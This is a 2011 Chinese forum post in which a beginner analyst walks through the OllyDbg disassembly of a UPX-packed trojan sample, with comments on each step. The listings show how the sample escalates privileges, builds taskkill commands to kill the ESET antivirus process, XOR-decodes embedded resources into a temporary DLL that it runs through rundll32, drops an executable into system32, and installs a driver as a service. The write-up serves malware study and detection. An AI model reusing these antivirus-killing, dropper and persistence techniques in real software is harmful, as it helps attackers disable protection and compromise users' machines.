对一款小木马的分析 by 曹无咎[LSG]

曹无咎 · 发表于 2011-3-29 16:57

本帖最后由曹无咎于 2011-9-17 23:05 编辑

文章标题：对一款启发式小木马的分析
所用工具：OD，PEid
时间：2011.3.29
样本：见附件
菜鸟对一款小木马的分析，算是第一次分析吧，失误之处还请同学们指正
感谢52pojie，感谢LSG（怎么说呢，浑浑噩噩的加入了LSG，一个月来，没有任何分析，徒挂虚衔），感谢各路大婶。好了废话不多说，开始分析：
1.这款木马加了一个压缩壳（upx），一般木马病毒是不会加加密壳的（增大了体积），脱壳esp定律就可搞定
2.到达OEP（402230）后，先观察入口，会看到一些很明显的函数了，现在我们来分析下，这个木马都实现了哪些操作：
首先，创建一个名为TGame...的互斥变量：
00402230 81EC 680B0000 sub    esp, 0B68
00402236 53             push ebx
00402237 55             push ebp
00402238 56             push esi
00402239 57             push edi
0040223A B9 3F000000    mov    ecx, 3F
0040223F 33C0          xor    eax, eax
00402241 8DBC24 74050000 lea    edi, dword ptr [esp+574]
00402248 68 E0134000    push 004013E0                         ; ASCII "TGmae..."
0040224D F3:AB          rep    stos dword ptr es:[edi]
0040224F 66:AB          stos word ptr es:[edi]
00402251 AA             stos byte ptr es:[edi]
00402252 B9 3F000000    mov    ecx, 3F
00402257 33C0          xor    eax, eax
00402259 8DBC24 78070000 lea    edi, dword ptr [esp+778]
00402260 B3 5C          mov    bl, 5C
00402262 F3:AB          rep    stos dword ptr es:[edi]
00402264 66:AB          stos word ptr es:[edi]
00402266 AA             stos byte ptr es:[edi]
00402267 B9 3F000000    mov    ecx, 3F
0040226C 33C0          xor    eax, eax
0040226E 8DBC24 78060000 lea    edi, dword ptr [esp+678]
00402275 6A 00          push 0
00402277 F3:AB          rep    stos dword ptr es:[edi]
00402279 66:AB          stos word ptr es:[edi]
0040227B AA             stos byte ptr es:[edi]
0040227C B9 3F000000    mov    ecx, 3F
00402281 33C0          xor    eax, eax
00402283 8D7C24 78    lea    edi, dword ptr [esp+78]
00402287 6A 00          push 0
00402289 F3:AB          rep    stos dword ptr es:[edi]
0040228B 66:AB          stos word ptr es:[edi]
0040228D 885C24 24    mov    byte ptr [esp+24], bl
00402291 C64424 25 45 mov    byte ptr [esp+25], 45
00402296 C64424 26 78 mov    byte ptr [esp+26], 78
0040229B C64424 27 70 mov    byte ptr [esp+27], 70
004022A0 C64424 28 6C mov    byte ptr [esp+28], 6C
004022A5 C64424 29 6F mov    byte ptr [esp+29], 6F
004022AA C64424 2A 72 mov    byte ptr [esp+2A], 72
004022AF C64424 2B 65 mov    byte ptr [esp+2B], 65
004022B4 C64424 2C 72 mov    byte ptr [esp+2C], 72
004022B9 C64424 2D 2E mov    byte ptr [esp+2D], 2E
004022BE C64424 2E 45 mov    byte ptr [esp+2E], 45
004022C3 C64424 2F 58 mov    byte ptr [esp+2F], 58
004022C8 C64424 30 45 mov    byte ptr [esp+30], 45
004022CD C64424 31 00 mov    byte ptr [esp+31], 0
004022D2 AA             stos byte ptr es:[edi]
004022D3 FF15 84104000 call dword ptr [401084]       创建互斥变量
004022D9 FF15 80104000 call dword ptr [401080]       获取最后一次错误

3.获取WINDOWS路径，并连接之，得到路径 C:\WINDOWS\Explorer.EXE：

004022EE 8B35 7C104000 mov    esi, dword ptr [40107C]       获取WINDOWS路径
004022F4 8D8424 74060000 lea    eax, dword ptr [esp+674]
004022FB 68 FF000000    push 0FF
00402300 50             push eax
00402301 FFD6          call esi
00402303 8D8C24 74050000 lea    ecx, dword ptr [esp+574]
0040230A 68 FF000000    push 0FF
0040230F 51             push ecx
00402310 FFD6          call esi
00402312 8B35 94104000 mov    esi, dword ptr [401094]       字符串连接，得到C:\WINDOWS\Explorer.EXE
00402318 8D5424 18    lea    edx, dword ptr [esp+18]
0040231C 8D8424 74050000 lea    eax, dword ptr [esp+574]
00402323 52             push edx
00402324 50             push eax
00402325 FFD6          call esi

4.获取系统路径C:\WINDOWS\SYSTEM32

0040232E 68 FF000000    push 0FF
00402333 51             push ecx
00402334 885C24 4C    mov    byte ptr [esp+4C], bl
00402338 C64424 4D 74 mov    byte ptr [esp+4D], 74
0040233D C64424 4E 65 mov    byte ptr [esp+4E], 65
00402342 C64424 4F 6D mov    byte ptr [esp+4F], 6D
00402347 C64424 50 70 mov    byte ptr [esp+50], 70
0040234C 885C24 51    mov    byte ptr [esp+51], bl
00402350 C64424 52 45 mov    byte ptr [esp+52], 45
00402355 C64424 53 78 mov    byte ptr [esp+53], 78
0040235A C64424 54 70 mov    byte ptr [esp+54], 70
0040235F C64424 55 6C mov    byte ptr [esp+55], 6C
00402364 C64424 56 6F mov    byte ptr [esp+56], 6F
00402369 C64424 57 72 mov    byte ptr [esp+57], 72
0040236E C64424 58 65 mov    byte ptr [esp+58], 65
00402373 C64424 59 72 mov    byte ptr [esp+59], 72
00402378 C64424 5A 2E mov    byte ptr [esp+5A], 2E
0040237D C64424 5B 65 mov    byte ptr [esp+5B], 65
00402382 C64424 5C 78 mov    byte ptr [esp+5C], 78
00402387 C64424 5D 65 mov    byte ptr [esp+5D], 65
0040238C C64424 5E 00 mov    byte ptr [esp+5E], 0
00402391 FF15 90104000 call dword ptr [401090]             获取系统目录
00402397 8D5424 70    lea    edx, dword ptr [esp+70]

5.获取相应模块的完整路径信息：

004023F1 FF15 58104000 call dword ptr [401058]    GetModuleFileNameA

6.跳转到00402469，获取系统权限

00402469 E8 D2F9FFFF    call 00401E40       此为获取函数

{
00401E40 83EC 14       sub    esp, 14
00401E43 8D4424 00    lea    eax, dword ptr [esp]
00401E47 50             push eax
00401E48 6A 28          push 28
00401E4A FF15 6C104000 call dword ptr [40106C]          获取当前运行的进程
00401E50 50             push eax
00401E51 FF15 20104000 call dword ptr [401020]          遍历进程
00401E57 85C0          test eax, eax
00401E59 0F95C0       setne al
00401E5C 84C0          test al, al
00401E5E 75 04          jnz    short 00401E64
00401E60 83C4 14       add    esp, 14
00401E63 C3             retn
00401E64 8D4C24 08    lea    ecx, dword ptr [esp+8]
00401E68 51             push ecx
00401E69 68 5C134000    push 0040135C                      检测进程句柄
00401E6E 6A 00          push 0
00401E70 FF15 1C104000 call dword ptr [40101C]             ; ADVAPI32.LookupPrivilegeValueA
00401E76 85C0          test eax, eax
00401E78 0F95C0       setne al
00401E7B 84C0          test al, al
00401E7D 75 04          jnz    short 00401E83
00401E7F 83C4 14       add    esp, 14
00401E82 C3             retn
00401E83 8B4424 00    mov    eax, dword ptr [esp]
00401E87 6A 00          push 0
00401E89 6A 00          push 0
00401E8B 8D5424 0C    lea    edx, dword ptr [esp+C]
00401E8F 6A 10          push 10
00401E91 52             push edx
00401E92 6A 00          push 0
00401E94 50             push eax
00401E95 C74424 1C 01000>mov    dword ptr [esp+1C], 1
00401E9D C74424 28 02000>mov    dword ptr [esp+28], 2
00401EA5 FF15 18104000 call dword ptr [401018]             ; ADVAPI32.AdjustTokenPrivileges
00401EAB 85C0          test eax, eax
00401EAD 0F95C0       setne al
00401EB0 83C4 14       add    esp, 14
00401EB3 C3             retn
}

7.开始干杀软了，主要是干掉eset：

00402490 E8 DBF4FFFF    call 00401970       干杀软函数
{
00401970 83EC 58       sub    esp, 58
00401973 53             push ebx
00401974 B3 63          mov    bl, 63
00401976 B0 20          mov    al, 20
00401978 B2 2F          mov    dl, 2F
0040197A B1 65          mov    cl, 65
0040197C 885C24 04    mov    byte ptr [esp+4], bl
00401980 C64424 05 6D mov    byte ptr [esp+5], 6D
00401985 C64424 06 64 mov    byte ptr [esp+6], 64
0040198A 884424 07    mov    byte ptr [esp+7], al
0040198E 885424 08    mov    byte ptr [esp+8], dl
00401992 885C24 09    mov    byte ptr [esp+9], bl
00401996 884424 0A    mov    byte ptr [esp+A], al
0040199A C64424 0B 73 mov    byte ptr [esp+B], 73
0040199F 885C24 0C    mov    byte ptr [esp+C], bl
004019A3 884424 0D    mov    byte ptr [esp+D], al
004019A7 C64424 0E 64 mov    byte ptr [esp+E], 64
004019AC 884C24 0F    mov    byte ptr [esp+F], cl
004019B0 C64424 10 6C mov    byte ptr [esp+10], 6C
004019B5 884C24 11    mov    byte ptr [esp+11], cl
004019B9 C64424 12 74 mov    byte ptr [esp+12], 74
004019BE 884C24 13    mov    byte ptr [esp+13], cl
004019C2 884424 14    mov    byte ptr [esp+14], al
004019C6 884C24 15    mov    byte ptr [esp+15], cl
004019CA C64424 16 6B mov    byte ptr [esp+16], 6B
004019CF C64424 17 72 mov    byte ptr [esp+17], 72
004019D4 C64424 18 6E mov    byte ptr [esp+18], 6E
004019D9 C64424 19 00 mov    byte ptr [esp+19], 0
004019DE 885C24 1C    mov    byte ptr [esp+1C], bl
004019E2 C64424 1D 6D mov    byte ptr [esp+1D], 6D
004019E7 C64424 1E 64 mov    byte ptr [esp+1E], 64
004019EC 884424 1F    mov    byte ptr [esp+1F], al
004019F0 885424 20    mov    byte ptr [esp+20], dl
004019F4 885C24 21    mov    byte ptr [esp+21], bl
004019F8 884424 22    mov    byte ptr [esp+22], al
004019FC C64424 23 74 mov    byte ptr [esp+23], 74
00401A01 C64424 24 61 mov    byte ptr [esp+24], 61
00401A06 C64424 25 73 mov    byte ptr [esp+25], 73
00401A0B C64424 26 6B mov    byte ptr [esp+26], 6B
00401A10 C64424 27 6B mov    byte ptr [esp+27], 6B
00401A15 C64424 28 69 mov    byte ptr [esp+28], 69
00401A1A C64424 29 6C mov    byte ptr [esp+29], 6C
00401A1F C64424 2A 6C mov    byte ptr [esp+2A], 6C
00401A24 884424 2B    mov    byte ptr [esp+2B], al
00401A28 885424 2C    mov    byte ptr [esp+2C], dl
00401A2C C64424 2D 69 mov    byte ptr [esp+2D], 69
00401A31 C64424 2E 6D mov    byte ptr [esp+2E], 6D
00401A36 884424 2F    mov    byte ptr [esp+2F], al
00401A3A 884C24 30    mov    byte ptr [esp+30], cl
00401A3E C64424 31 6B mov    byte ptr [esp+31], 6B
00401A43 C64424 32 72 mov    byte ptr [esp+32], 72
00401A48 C64424 33 6E mov    byte ptr [esp+33], 6E
00401A4D C64424 34 2E mov    byte ptr [esp+34], 2E
00401A52 884C24 35    mov    byte ptr [esp+35], cl
00401A56 C64424 36 78 mov    byte ptr [esp+36], 78
00401A5B 884C24 37    mov    byte ptr [esp+37], cl
00401A5F 884424 38    mov    byte ptr [esp+38], al
00401A63 885424 39    mov    byte ptr [esp+39], dl
00401A67 C64424 3A 66 mov    byte ptr [esp+3A], 66
00401A6C 885C24 3C    mov    byte ptr [esp+3C], bl
00401A70 C64424 3D 6D mov    byte ptr [esp+3D], 6D
00401A75 C64424 3E 64 mov    byte ptr [esp+3E], 64
00401A7A 884424 3F    mov    byte ptr [esp+3F], al
00401A7E 885424 40    mov    byte ptr [esp+40], dl
00401A82 885C24 41    mov    byte ptr [esp+41], bl
00401A86 884424 42    mov    byte ptr [esp+42], al
00401A8A C64424 43 74 mov    byte ptr [esp+43], 74
00401A8F C64424 44 61 mov    byte ptr [esp+44], 61
00401A94 C64424 45 73 mov    byte ptr [esp+45], 73
00401A99 C64424 46 6B mov    byte ptr [esp+46], 6B
00401A9E C64424 47 6B mov    byte ptr [esp+47], 6B
00401AA3 C64424 48 69 mov    byte ptr [esp+48], 69
00401AA8 C64424 49 6C mov    byte ptr [esp+49], 6C
00401AAD C64424 4A 6C mov    byte ptr [esp+4A], 6C
00401AB2 884424 4B    mov    byte ptr [esp+4B], al
00401AB6 885424 4C    mov    byte ptr [esp+4C], dl
00401ABA C64424 4D 69 mov    byte ptr [esp+4D], 69
00401ABF C64424 4E 6D mov    byte ptr [esp+4E], 6D
00401AC4 884424 4F    mov    byte ptr [esp+4F], al
00401AC8 884C24 50    mov    byte ptr [esp+50], cl
00401ACC C64424 51 67 mov    byte ptr [esp+51], 67
00401AD1 C64424 52 75 mov    byte ptr [esp+52], 75
00401AD6 68 D0124000    push 004012D0                      ; ASCII "ekrn.exe"
00401ADB C64424 57 69 mov    byte ptr [esp+57], 69
00401AE0 C64424 58 2E mov    byte ptr [esp+58], 2E
00401AE5 884C24 59    mov    byte ptr [esp+59], cl
00401AE9 C64424 5A 78 mov    byte ptr [esp+5A], 78
00401AEE 884C24 5B    mov    byte ptr [esp+5B], cl
00401AF2 884424 5C    mov    byte ptr [esp+5C], al
00401AF6 885424 5D    mov    byte ptr [esp+5D], dl
00401AFA C64424 5E 66 mov    byte ptr [esp+5E], 66
00401AFF E8 ECFDFFFF    call 004018F0                      遍历系统进程
即 createtoolhelp32snapshot
process32first
  process32next
00401B04 83C4 04       add    esp, 4
00401B07 85C0          test eax, eax
00401B09 5B             pop    ebx
00401B0A 74 5C          je    short 00401B68                   系统裸奔，所以跳走了，安装eset的可以继续跟踪
00401B0C 6A 00          push 0
00401B0E 6A 00          push 0
00401B10 8D4424 08    lea    eax, dword ptr [esp+8]
00401B14 68 E4104000    push 004010E4
00401B19 50             push eax
00401B1A 68 C8124000    push 004012C8                      ; ASCII "open"
00401B1F 6A 00          push 0
00401B21 E8 1AF9FFFF    call 00401440
00401B26 6A 00          push 0
00401B28 6A 00          push 0
00401B2A 8D4C24 38    lea    ecx, dword ptr [esp+38]
00401B2E 68 E4104000    push 004010E4
00401B33 51             push ecx
00401B34 68 C8124000    push 004012C8                      ; ASCII "open"
00401B39 6A 00          push 0
00401B3B E8 00F9FFFF    call 00401440
00401B40 6A 00          push 0
00401B42 6A 00          push 0
00401B44 8D5424 70    lea    edx, dword ptr [esp+70]
00401B48 68 E4104000    push 004010E4
00401B4D 52             push edx
00401B4E 68 C8124000    push 004012C8                      ; ASCII "open"
00401B53 6A 00          push 0
00401B55 E8 E6F8FFFF    call 00401440
00401B5A 83C4 48       add    esp, 48
00401B5D 68 F4010000    push 1F4
00401B62 FF15 9C104000 call dword ptr [40109C]             ; kernel32.Sleep
00401B68 83C4 58       add    esp, 58
00401B6B C3             retn
}

8.开始生成文件：
0040249C E8 3FF8FFFF    call 00401CE0
call进去看看：
{
00401CE0 81EC 54030000 sub    esp, 354
00401CE6 53             push ebx
00401CE7 56             push esi
00401CE8 57             push edi
00401CE9 B9 3F000000    mov    ecx, 3F
00401CEE 33C0          xor    eax, eax
00401CF0 8D7C24 60    lea    edi, dword ptr [esp+60]
00401CF4 F3:AB          rep    stos dword ptr es:[edi]
00401CF6 66:AB          stos word ptr es:[edi]
00401CF8 AA             stos byte ptr es:[edi]
00401CF9 B9 3F000000    mov    ecx, 3F
00401CFE 33C0          xor    eax, eax
00401D00 8DBC24 60020000 lea    edi, dword ptr [esp+260]
00401D07 F3:AB          rep    stos dword ptr es:[edi]
00401D09 66:AB          stos word ptr es:[edi]
00401D0B AA             stos byte ptr es:[edi]
00401D0C B9 3F000000    mov    ecx, 3F
00401D11 33C0          xor    eax, eax
00401D13 8DBC24 60010000 lea    edi, dword ptr [esp+160]
00401D1A F3:AB          rep    stos dword ptr es:[edi]
00401D1C 66:AB          stos word ptr es:[edi]
00401D1E AA             stos byte ptr es:[edi]
00401D1F FF15 68104000 call dword ptr [401068]             获取系统启动时间
00401D25 50             push eax
00401D26 8D8424 64020000 lea    eax, dword ptr [esp+264]
00401D2D 68 54134000    push 00401354                      ; ASCII "%d.dll"
00401D32 50             push eax
00401D33 FF15 DC104000 call dword ptr [4010DC]             由此可知，依据洗头膏运行的时间生成dll的名字，也就是说，这个dll的名字是动态的了
00401D39 83C4 0C       add    esp, 0C
00401D3C 8D4C24 60    lea    ecx, dword ptr [esp+60]
00401D40 51             push ecx
00401D41 68 FF000000    push 0FF
00401D46 FF15 AC104000 call dword ptr [4010AC]             获取temp路径
00401D4C 8B35 94104000 mov    esi, dword ptr [401094]       字符串连接函数
00401D52 8D9424 60020000 lea    edx, dword ptr [esp+260]       2128328.dll
00401D59 8D4424 60    lea    eax, dword ptr [esp+60]          C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
00401D5D 52             push edx
00401D5E 50             push eax
00401D5F FFD6          call esi                            连接字符串生成： C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll
00401D61 8D4C24 60    lea    ecx, dword ptr [esp+60]
00401D65 6A 66          push 66
00401D67 51             push ecx
00401D68 E8 C3FAFFFF    call 00401830                      在上述路径中生成dll
到00401830这个函数里面看看
{
00401830 55             push ebp
00401831 8BEC          mov    ebp, esp
00401833 83EC 0C       sub    esp, 0C
00401836 8B4D 08       mov    ecx, dword ptr [ebp+8]
00401839 A1 C4124000    mov    eax, dword ptr [4012C4]
0040183E 6A 00          push 0
00401840 6A 00          push 0
00401842 6A 02          push 2
00401844 6A 00          push 0
00401846 6A 00          push 0
00401848 68 00000040    push 40000000
0040184D 51             push ecx
0040184E 8945 FC       mov    dword ptr [ebp-4], eax
00401851 FF15 88104000 call dword ptr [401088]             生成2128328.dll
00401857 85C0          test eax, eax
00401859 8945 F4       mov    dword ptr [ebp-C], eax
0040185C 0F84 82000000 je    004018E4
00401862 8B45 0C       mov    eax, dword ptr [ebp+C]
00401865 53             push ebx
00401866 56             push esi
00401867 8D55 FC       lea    edx, dword ptr [ebp-4]
0040186A 57             push edi
0040186B 52             push edx
0040186C 50             push eax
0040186D 6A 00          push 0
0040186F FF15 40104000 call dword ptr [401040]             寻找资源
00401875 8BF8          mov    edi, eax
00401877 57             push edi
00401878 6A 00          push 0
0040187A FF15 3C104000 call dword ptr [40103C]             加载资源
00401880 50             push eax
00401881 8945 0C       mov    dword ptr [ebp+C], eax
00401884 33F6          xor    esi, esi
00401886 FF15 38104000 call dword ptr [401038]             获取变量的内存地址
0040188C 8BD8          mov    ebx, eax
0040188E C645 0B 00    mov    byte ptr [ebp+B], 0
00401892 90             nop
00401893 57             push edi
00401894 56             push esi
00401895 FF15 34104000 call dword ptr [401034]             返回资源大小
0040189B 85C0          test eax, eax
0040189D 74 2E          je    short 004018CD
0040189F 90             nop
004018A0 8A0C33       mov    cl, byte ptr [ebx+esi]
004018A3 8D55 F8       lea    edx, dword ptr [ebp-8]
004018A6 80F1 06       xor    cl, 6
004018A9 6A 00          push 0
004018AB 884D 0B       mov    byte ptr [ebp+B], cl
004018AE 8B4D F4       mov    ecx, dword ptr [ebp-C]
004018B1 52             push edx
004018B2 8D45 0B       lea    eax, dword ptr [ebp+B]
004018B5 6A 01          push 1
004018B7 50             push eax
004018B8 51             push ecx
004018B9 FF15 30104000 call dword ptr [401030]             写文件
004018BF 57             push edi
004018C0 6A 00          push 0
004018C2 46             inc    esi
004018C3 FF15 34104000 call dword ptr [401034]             返回资源大小
004018C9 3BF0          cmp    esi, eax
004018CB  ^ 72 D3          jb    short 004018A0
004018CD 8B55 0C       mov    edx, dword ptr [ebp+C]
004018D0 52             push edx
004018D1 FF15 2C104000 call dword ptr [40102C]             释放资源
004018D7 8B45 F4       mov    eax, dword ptr [ebp-C]
004018DA 50             push eax
004018DB FF15 64104000 call dword ptr [401064]             关闭句柄
004018E1 5F             pop    edi
004018E2 5E             pop    esi
004018E3 5B             pop    ebx
004018E4 8BE5          mov    esp, ebp
004018E6 5D             pop    ebp
004018E7 C2 0800       retn 8
}
00401D6D 8B1D 8C104000 mov    ebx, dword ptr [40108C]       ; kernel32.lstrcpyA
00401D73 8D5424 60    lea    edx, dword ptr [esp+60]
00401D77 8D8424 60010000 lea    eax, dword ptr [esp+160]
00401D7E 52             push edx
00401D7F 50             push eax
00401D80 FFD3          call ebx
00401D82 8D4C24 60    lea    ecx, dword ptr [esp+60]
00401D86 68 48134000    push 00401348                      ; ASCII " testall"
00401D8B 51             push ecx
00401D8C FFD6          call esi
00401D8E B9 3F000000    mov    ecx, 3F
00401D93 33C0          xor    eax, eax                   C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall
00401D95 8DBC24 60010000 lea    edi, dword ptr [esp+160]
00401D9C 8D9424 60010000 lea    edx, dword ptr [esp+160]
00401DA3 F3:AB          rep    stos dword ptr es:[edi]
00401DA5 66:AB          stos word ptr es:[edi]
00401DA7 68 38134000    push 00401338                      用rundll32.exe加载此dll
00401DAC 52             push edx
00401DAD AA             stos byte ptr es:[edi]
00401DAE FFD3          call ebx
00401DB0 8D4424 60    lea    eax, dword ptr [esp+60]
00401DB4 8D8C24 60010000 lea    ecx, dword ptr [esp+160]
00401DBB 50             push eax
00401DBC 51             push ecx
00401DBD FFD6          call esi
00401DBF B9 11000000    mov    ecx, 11
00401DC4 33C0          xor    eax, eax
00401DC6 8D7C24 1C    lea    edi, dword ptr [esp+1C]
00401DCA 8D5424 0C    lea    edx, dword ptr [esp+C]
00401DCE F3:AB          rep    stos dword ptr es:[edi]
00401DD0 8D4C24 1C    lea    ecx, dword ptr [esp+1C]
00401DD4 52             push edx
00401DD5 51             push ecx
00401DD6 C74424 24 44000>mov    dword ptr [esp+24], 44
00401DDE 894424 50    mov    dword ptr [esp+50], eax
00401DE2 66:C74424 54 05>mov    word ptr [esp+54], 5
00401DE9 894424 60    mov    dword ptr [esp+60], eax
00401DED 894424 64    mov    dword ptr [esp+64], eax
00401DF1 50             push eax
00401DF2 50             push eax
00401DF3 50             push eax
00401DF4 6A 01          push 1
00401DF6 50             push eax
00401DF7 8D9424 7C010000 lea    edx, dword ptr [esp+17C]
00401DFE 50             push eax
00401DFF 52             push edx
00401E00 50             push eax
00401E01 FF15 60104000 call dword ptr [401060]             创建一个进程
{
0012F134 00000000  |ModuleFileName = NULL
0012F138 0012F2BC  |CommandLine = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall"
0012F13C 00000000  |pProcessSecurity = NULL
0012F140 00000000  |pThreadSecurity = NULL
0012F144 00000001  |InheritHandles = TRUE
0012F148 00000000  |CreationFlags = 0
0012F14C 00000000  |pEnvironment = NULL
0012F150 00000000  |CurrentDir = NULL
0012F154 0012F178  |pStartupInfo = 0012F178
0012F158 0012F168  \pProcessInfo = 0012F168
}
00401E07 5F             pop    edi
00401E08 5E             pop    esi
00401E09 85C0          test eax, eax
00401E0B 5B             pop    ebx
00401E0C 74 18          je    short 00401E26
00401E0E 8B4424 04    mov    eax, dword ptr [esp+4]
00401E12 50             push eax
00401E13 FF15 64104000 call dword ptr [401064]             关闭句柄
00401E19 8B4C24 00    mov    ecx, dword ptr [esp]
00401E1D 6A FF          push -1
00401E1F 51             push ecx
00401E20 FF15 5C104000 call dword ptr [40105C]             WaitForSingleObject（检测handle是否还存在）
00401E26 8D9424 54010000 lea    edx, dword ptr [esp+154]
00401E2D 52             push edx
00401E2E FF15 A0104000 call dword ptr [4010A0]             删除文件
{
0012F164 0012F2BC  \FileName = "rundll32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2128328.dll testall"
}
00401E34 81C4 54030000 add    esp, 354
00401E3A C3             retn

}

9.继续向下分析（继续生成文件）：
004024DA 50             push eax
004024DB FF15 90104000 call dword ptr [401090]             获取系统路径
004024E1 FF15 68104000 call dword ptr [401068]             获取系统启动时间，估计是要生成文件了
004024E7 50             push eax
004024E8 8D8C24 78090000 lea    ecx, dword ptr [esp+978]
004024EF 68 D8134000    push 004013D8                      ; ASCII "%d.exe"
004024F4 51             push ecx
004024F5 FF15 DC104000 call dword ptr [4010DC]             ; USER32.wsprintfA
004024FB 83C4 0C       add    esp, 0C
004024FE 8D9424 70030000 lea    edx, dword ptr [esp+370]
00402505 68 D4134000    push 004013D4
0040250A 52             push edx
0040250B FFD6          call esi                            生成一个名为3412296.exe的可执行文件
生成的3412296.exe存放在C:\WINDOWS\system32\3412296.exe此为路径
0040250D 8D8424 74090000 lea    eax, dword ptr [esp+974]
00402514 8D8C24 70030000 lea    ecx, dword ptr [esp+370]
0040251B 50             push eax
0040251C 51             push ecx
0040251D FFD6          call esi
0040251F 8D9424 70030000 lea    edx, dword ptr [esp+370]
00402526 6A 65          push 65
00402528 52             push edx
00402529 E8 02F3FFFF    call 00401830             同理这个call是生成文件，上面已经分析过了，这里不详细分析了哈
0040252E 6A 00          push 0
00402530 6A 00          push 0
00402532 8D8424 78030000 lea    eax, dword ptr [esp+378]
00402539 68 E4104000    push 004010E4
0040253E 50             push eax
0040253F 68 C8124000    push 004012C8                      ; ASCII "open"
00402544 6A 00          push 0
00402546 E8 F5EEFFFF    call 00401440                加载库文件，call进去看看
{
00401440 56             push esi
00401441 68 A0124000    push 004012A0                      ; ASCII "shell32.dll"
00401446 FF15 A4104000 call dword ptr [4010A4]             LoadLibraryA
0040144C 8BF0          mov    esi, eax                      ; shell32.#599
0040144E 68 90124000    push 00401290                      ; ASCII "ShellExecuteA"
00401453 56             push esi
00401454 FF15 A8104000 call dword ptr [4010A8]             ; kernel32.GetProcAddress
0040145A 85C0          test eax, eax
0040145C 74 27          je    short 00401485
0040145E 8B4C24 1C    mov    ecx, dword ptr [esp+1C]
00401462 8B5424 18    mov    edx, dword ptr [esp+18]
00401466 51             push ecx
00401467 8B4C24 18    mov    ecx, dword ptr [esp+18]
0040146B 52             push edx
0040146C 8B5424 18    mov    edx, dword ptr [esp+18]
00401470 51             push ecx
00401471 8B4C24 18    mov    ecx, dword ptr [esp+18]
00401475 52             push edx
00401476 8B5424 18    mov    edx, dword ptr [esp+18]
0040147A 51             push ecx
0040147B 52             push edx
0040147C FFD0          call eax                         ShellExecute的功能是运行一个外部程序这里是运行刚刚生成的文件了
0040147E 56             push esi
0040147F FF15 B0104000 call dword ptr [4010B0]             ; kernel32.FreeLibrary
00401485 5E             pop    esi
00401486 C3             retn

}

10.接下来开始生成驱动文件了（生成一个名为pcidump.sys的驱动文件）：
生成路径为：
C:\WINDOWS\system32\drivers\pcidump.sys
00402659 6A 67          push 67
0040265B 52             push edx
0040265C E8 CFF1FFFF    call 00401830             又见此函数，你懂的，这里就不call进去看了，生成驱动文件
00402661 8D8424 70020000 lea    eax, dword ptr [esp+270]
00402668 50             push eax
00402669 E8 22EEFFFF    call 00401490          开始做坏事了，传说中的启发式，哈哈，创建后门
{
00401490 55             push ebp
00401491 8BEC          mov    ebp, esp
00401493 83EC 24       sub    esp, 24
00401496 56             push esi
00401497 68 3F000F00    push 0F003F
0040149C B0 70          mov    al, 70
0040149E 6A 00          push 0
004014A0 6A 00          push 0
004014A2 8845 F8       mov    byte ptr [ebp-8], al
004014A5 C645 F9 63    mov    byte ptr [ebp-7], 63
004014A9 C645 FA 69    mov    byte ptr [ebp-6], 69
004014AD C645 FB 64    mov    byte ptr [ebp-5], 64
004014B1 C645 FC 75    mov    byte ptr [ebp-4], 75
004014B5 C645 FD 6D    mov    byte ptr [ebp-3], 6D
004014B9 8845 FE       mov    byte ptr [ebp-2], al
004014BC C645 FF 00    mov    byte ptr [ebp-1], 0
004014C0 FF15 14104000 call dword ptr [401014]             打开服务管理器
004014C6 8BF0          mov    esi, eax
004014C8 85F6          test esi, esi
004014CA 0F84 CD000000 je    0040159D
004014D0 53             push ebx
004014D1 57             push edi
004014D2 90             nop
004014D3 8B5D 08       mov    ebx, dword ptr [ebp+8]
004014D6 6A 00          push 0
004014D8 6A 00          push 0
004014DA 6A 00          push 0
004014DC 6A 00          push 0
004014DE 6A 00          push 0
004014E0 53             push ebx
004014E1 6A 00          push 0
004014E3 6A 03          push 3
004014E5 6A 01          push 1
004014E7 8D45 F8       lea    eax, dword ptr [ebp-8]
004014EA 68 FF010F00    push 0F01FF
004014EF 8D4D F8       lea    ecx, dword ptr [ebp-8]
004014F2 50             push eax
004014F3 51             push ecx
004014F4 56             push esi
004014F5 FF15 10104000 call dword ptr [401010]             创建服务
004014FB 85C0          test eax, eax
004014FD 75 5A          jnz    short 00401559
004014FF 8D55 F8       lea    edx, dword ptr [ebp-8]
00401502 68 FF010F00    push 0F01FF
00401507 52             push edx
00401508 56             push esi
00401509 FF15 0C104000 call dword ptr [40100C]             打开服务
0040150F 8BF8          mov    edi, eax
00401511 85FF          test edi, edi
00401513 74 1B          je    short 00401530
00401515 8D45 DC       lea    eax, dword ptr [ebp-24]
00401518 50             push eax
00401519 6A 01          push 1
0040151B 57             push edi
0040151C FF15 08104000 call dword ptr [401008]             控制服务
00401522 57             push edi
00401523 FF15 04104000 call dword ptr [401004]             删除服务
00401529 57             push edi
0040152A FF15 00104000 call dword ptr [401000]             ; ADVAPI32.CloseServiceHandle关闭服务句柄
00401530 6A 00          push 0
00401532 6A 00          push 0
00401534 6A 00          push 0
00401536 6A 00          push 0
00401538 6A 00          push 0
0040153A 53             push ebx
0040153B 6A 00          push 0
0040153D 6A 03          push 3
0040153F 6A 01          push 1
00401541 8D4D F8       lea    ecx, dword ptr [ebp-8]
00401544 68 FF010F00    push 0F01FF
00401549 8D55 F8       lea    edx, dword ptr [ebp-8]
0040154C 51             push ecx
0040154D 52             push edx
0040154E 56             push esi
0040154F FF15 10104000 call dword ptr [401010]             创建服务
00401555 85C0          test eax, eax
00401557 74 33          je    short 0040158C
00401559 50             push eax
0040155A FF15 00104000 call dword ptr [401000]             关闭服务句柄
00401560 8D45 F8       lea    eax, dword ptr [ebp-8]
00401563 6A 10          push 10
00401565 50             push eax
00401566 56             push esi
00401567 FF15 0C104000 call dword ptr [40100C]             打开服务
0040156D 8BF8          mov    edi, eax
0040156F 90             nop
00401570 85FF          test edi, edi
00401572 74 18          je    short 0040158C
00401574 90             nop
00401575 6A 00          push 0
00401577 6A 00          push 0
00401579 57             push edi
0040157A FF15 24104000 call dword ptr [401024]             启动服务
00401580 85C0          test eax, eax
00401582 75 07          jnz    short 0040158B
00401584 57             push edi
00401585 FF15 00104000 call dword ptr [401000]             关闭
0040158B 90             nop
0040158C 56             push esi
0040158D FF15 00104000 call dword ptr [401000]             关闭
00401593 8B45 08       mov    eax, dword ptr [ebp+8]
00401596 5F             pop    edi
00401597 5B             pop    ebx
00401598 5E             pop    esi
00401599 8BE5          mov    esp, ebp
0040159B 5D             pop    ebp
0040159C C3             retn
